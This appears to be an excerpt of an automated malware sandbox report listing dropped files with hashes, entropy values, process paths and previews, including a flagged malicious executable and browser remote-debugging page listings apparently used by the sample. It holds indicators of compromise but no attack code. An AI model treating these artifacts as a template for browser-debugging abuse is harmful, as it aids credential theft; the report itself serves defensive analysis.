                                                                                                                                                                                                                                                                                                                          SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                                          SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                                          SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):9
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                                          MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                                          SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                                          SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                                          SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:uriCache_
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):179
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.02016070034669
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclT7fcZBV:YWLSGTt1o9LuLgfGBPAzkVj/T8lEx
                                                                                                                                                                                                                                                                                                                          MD5:C848CAB8C301D589F74A1861899B09F0
                                                                                                                                                                                                                                                                                                                          SHA1:1541C98931E570874BCAA630EB67AFC0DBF5557F
                                                                                                                                                                                                                                                                                                                          SHA-256:D86754FA2E79FA1BAE483140CC2DA3944AEA67DD763F9474727DE3EB2943DC2A
                                                                                                                                                                                                                                                                                                                          SHA-512:7872F845C07A5A85984F6C44B1CCF84419C006A265D4B730D29B575173CFE524FE4EA2E796F3A54E46DE68DB7B7DBE832CA773E02045C2D7DE5E5D29AB29BFF9
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736799788986661}]}
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                                                          MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                                                          SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                                                          SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                                                          SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):44693
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.0962889891417475
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBnwu8hDO6vP6OgNouxc9y95cGoup1Xl3jVzXr4CCz:z/Ps+wsI7yOEB6Ayutchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                          MD5:6F147728D567DED443AFB2CDA14E1D75
                                                                                                                                                                                                                                                                                                                          SHA1:DF6F49F02BC5416E6BA9E12D82F92F983857A76A
                                                                                                                                                                                                                                                                                                                          SHA-256:997D1C0E69C38018D06D26751519D8F8AE93CB523CBEE588DEF8AA1E9414C0BE
                                                                                                                                                                                                                                                                                                                          SHA-512:3F2B04F05BB8D2C20E3DD3B46077AF1EC941BD8ABBA8B22B1E3276CDAFE28065E9FBD6490E755556F1A383795524C515CE2FDC43AA53A9F890B6A090D3EF0548
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2278
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8477984660141216
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxrgxy7xl9Il8usxPsuFOXvlN2f3T13nBY0bwxd1rc:mPfYnuFOXn2PT1XlX
                                                                                                                                                                                                                                                                                                                          MD5:61AA6D4C7FE2E08CDBB8A3EEB844B97F
                                                                                                                                                                                                                                                                                                                          SHA1:600FA2CE81535F2563684320F064E4BDCD8B9237
                                                                                                                                                                                                                                                                                                                          SHA-256:AD02CFEB3F00B5A21B11B7F5E6F212D3078606DDE781EB8E1368A44A85D359FD
                                                                                                                                                                                                                                                                                                                          SHA-512:F526524FA30EBF86500BD272A8925CBF1BB2E68545E176E4AED966C4F94FBB3F46D4094AF751FD298AEF23AE44ECEBA83B5557E843B5C2B3C88145CF8C0D9ABF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.G.a.g.p.R.Z.l.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.b.M.s.V.S.I.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):4622
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9949371718027233
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxExf7xD9Il8usxPs/X2tLPWSJc/emijCdKgIwCNYkAHaLJyjeuNdfk5FVC:jJYnPahJbGIgHVkAmmkJIdl6LbyXzL
                                                                                                                                                                                                                                                                                                                          MD5:0328E871D07F92682911BA0B4573C3AA
                                                                                                                                                                                                                                                                                                                          SHA1:500DEB029A3B2CEC06494D8031EC9D6946B79F25
                                                                                                                                                                                                                                                                                                                          SHA-256:5F23545DAE8F2E6BF3343AB9D93B0BD475DD99FBCA53AB7B5EFD3CE87FE6251B
                                                                                                                                                                                                                                                                                                                          SHA-512:1C1082F6D91CDDEAF6D41AC798B0F9414EA404B69DC0829582F5C47FD27CA1BD2897E68768ECAAA0AC7D6FBE541577831C274B43FAAE1289694E397953CC2B38
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".d.b.m.c.i.w.5.l.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.b.M.s.V.S.I.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2684
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8931128583949346
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKx68Wa7xqSxl9Il8usxPs5oDXMxHXl5BopC5XPGRvXGZ4S+d/vc:a02Yn2MB15l5/UXGZ4u
                                                                                                                                                                                                                                                                                                                          MD5:971055D1D72D15EEDA385A6AC12A4A29
                                                                                                                                                                                                                                                                                                                          SHA1:E80B0CDF030B6CA4A039A8784B474DB21624AF2C
                                                                                                                                                                                                                                                                                                                          SHA-256:950B273A6C1F9FD5D2458B4946ADCD949EDFB9EA782D79612F59886319C2BD07
                                                                                                                                                                                                                                                                                                                          SHA-512:6D9D86756504C5524CF35B95EBD85915E04B25C263D89C38F7B0F5DDCA85E8DAEBB232543EC57F2588F2A280FB03454CEEC317AAD86921D75246C68A6A3EB7E5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".N.z.U.R.v.N.+.D.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.b.M.s.V.S.I.
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):3500
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4002571894682125
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:96:6NnCuHCgNnCs4QbCszNnCI9CSNnCQG3dgECQRNnCTB2dCTBKNnCsDCPNnCgSGwCj:6NrNPNDNqvNi58N72NVINhlZi
                                                                                                                                                                                                                                                                                                                          MD5:D2BFEBB63F0EF2A89607E5D2DD5C478A
                                                                                                                                                                                                                                                                                                                          SHA1:4F9C94A69C0921E4463DBB021BC21B35A442D9CC
                                                                                                                                                                                                                                                                                                                          SHA-256:7B9BE4E1D9CF19DC3DD639A22028B65288562A051E06EF234DD8EF8E7099EE07
                                                                                                                                                                                                                                                                                                                          SHA-512:14C6B11044067A602F06325F4061C10B0A1434E17B50D12414D7712C1A4DFF618F2A560D3CD846EBB819B4242FDF754849F7F1D248CCD1C471F1C7782E486D9A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/1EDB958EB74DBF8A0E42181D3ABB5EF7",.. "id": "1EDB958EB74DBF8A0E42181D3ABB5EF7",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/1EDB958EB74DBF8A0E42181D3ABB5EF7"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/A4F098C01FEBD94B6692410FFB89A7C7",.. "id": "A4F098C01FEBD94B6692410FFB89A7C7",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/A4F098C01FEBD94B6692410FFB89A7C7"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1787
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3738898198690705
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:SfNaoCOwPTEC3YfNaoCQC6wfNaoCpCpfNaoCz0UrU0U8Cw:6NnCOwPTEC3kNnCQCpNnCpCFNnCz0Url
                                                                                                                                                                                                                                                                                                                          MD5:3CEC15878AE3CA1DD0AE94C05151C162
                                                                                                                                                                                                                                                                                                                          SHA1:820C66947A0019A2CF07E782BAEC66B255EC2C58
                                                                                                                                                                                                                                                                                                                          SHA-256:63C621001C465B012C19DF6CECA311CDE61515A60C1EFEDF5952569810969D86
                                                                                                                                                                                                                                                                                                                          SHA-512:91472CC4E9913FAC504A1FBB26E1117CBB34AEF14171CF6EF8F9CB786659B4CDE2AB6BA6A8A5501745F359A1D7B63D699D96D3422E308E9F35AF7DEE5DAAF0F5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/C7288A93911E70DDCA9676A1E1BF0D16",.. "id": "C7288A93911E70DDCA9676A1E1BF0D16",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/C7288A93911E70DDCA9676A1E1BF0D16"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/95A13B44DE41F8DD5700C991D758A27E",.. "id": "95A13B44DE41F8DD5700C991D758A27E",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/95A13B44DE41F8DD5700C991D758A27E"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):31335
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                                                          MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                                                          SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                                                          SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                                                          SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                                                          MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                                          SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                                                          SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                                                          SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                          Joe Sandbox View:
• Filename: 1E3Vcm2yrA.exe, Detection: malicious
• Filename: installer_1.05_37.4.exe, Detection: malicious
• Filename: c.hta, Detection: malicious
• Filename: c2.hta, Detection: malicious
• Filename: c2.hta, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Full-Ver_Setup.exe, Detection: malicious
• Filename: random.exe, Detection: malicious
                                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):373877
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999523205739592
                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:4y5feyG24G5FVwJBxhrD3iwTRGw7Lm3O8T+PYJO1QQkNUqUdwLGNGzx3J4qHHfDA:4y5feyj4GXaDywTRGEyxqWRNyNGzx3J+
                                                                                                                                                                                                                                                                                                                          MD5:7A038ACB7AD18B14FEB34DEA4F9AE936
                                                                                                                                                                                                                                                                                                                          SHA1:CE758807EBE12D778FE3F36273EAD0B84B35FBCE
                                                                                                                                                                                                                                                                                                                          SHA-256:4BDD3B8433B9A5BAABCF8AEA8E5D1B89855F8C6C13AD11511D126B1AE321BCAF
                                                                                                                                                                                                                                                                                                                          SHA-512:7F25711A37F77F472560CEF10113D8DFB4E29ED8F03B051645F10516034C21D0D0E6C717A70EDC1EF6FCE779775D011EDC824F2C55EA0930B2827F70836872D7
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):11185
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):69208
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.908041830471616
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:ysLuIz/M7tbZHar9lZ4JYtz0qgf8zNYuTTBJ339RGocxdD:rXz/M7tbZ67Z4JYFmfEfGDH
                                                                                                                                                                                                                                                                                                                          MD5:B10155F20921B7A18D158AF7E2FD2ED1
                                                                                                                                                                                                                                                                                                                          SHA1:17936568D096CAB854ED63484B0D13DAB8BFB38B
                                                                                                                                                                                                                                                                                                                          SHA-256:5525450C30952847876CCD32D6FEFB48EAB62943D1A154D57E8849C9B7DC16A2
                                                                                                                                                                                                                                                                                                                          SHA-512:EABC7F7670A3B4F3620E3FA865DA41C61463EAE5A6EB55DC8685899C12E758532C9EE304FB15253A7F139D054888919E24263D6BC62B96F1977F03EA92525F7C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
